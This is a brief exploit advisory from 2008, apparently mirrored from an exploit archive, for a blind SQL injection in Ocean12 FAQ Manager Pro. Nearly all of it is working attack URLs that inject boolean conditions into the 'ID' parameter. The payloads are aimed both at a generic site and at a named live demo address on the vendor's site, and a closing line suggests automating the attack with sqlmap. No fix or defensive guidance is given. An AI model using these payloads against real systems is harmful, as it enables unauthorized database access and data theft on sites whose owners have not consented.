id: 4294
date: 11/28/2008
title: Ocean12 FAQ Manager Pro (ID) Blind SQL Injection Vulnerabillity
author: Stack
cves: 

===============================================================
Ocean12 FAQ Manager Pro (ID) Blind SQL Injection Vulnerabillity
===============================================================


#########################################################
---------------------------------------------------------
Portal Name: Ocean12 FAQ Manager Pro
Author : Mountassif Moad
Vulnerability : Blind Sql Injection
---------------------------------------------------------
#########################################################
Exploit :
site.com/?Action=Cat&ID=40%20and%201=1 true
site.com/?Action=Cat&ID=40%20and%201=0 false
Demo :
http://ocean12tech.com/products/faq/demo/?Action=Cat&ID=40%20and%201=1 true
http://ocean12tech.com/products/faq/demo/?Action=Cat&ID=40%20and%201=0 false

# you can exploting the bug white blind sql automatic toolz such as sqlmap or ...



#  0day.today [2023-03-23]  #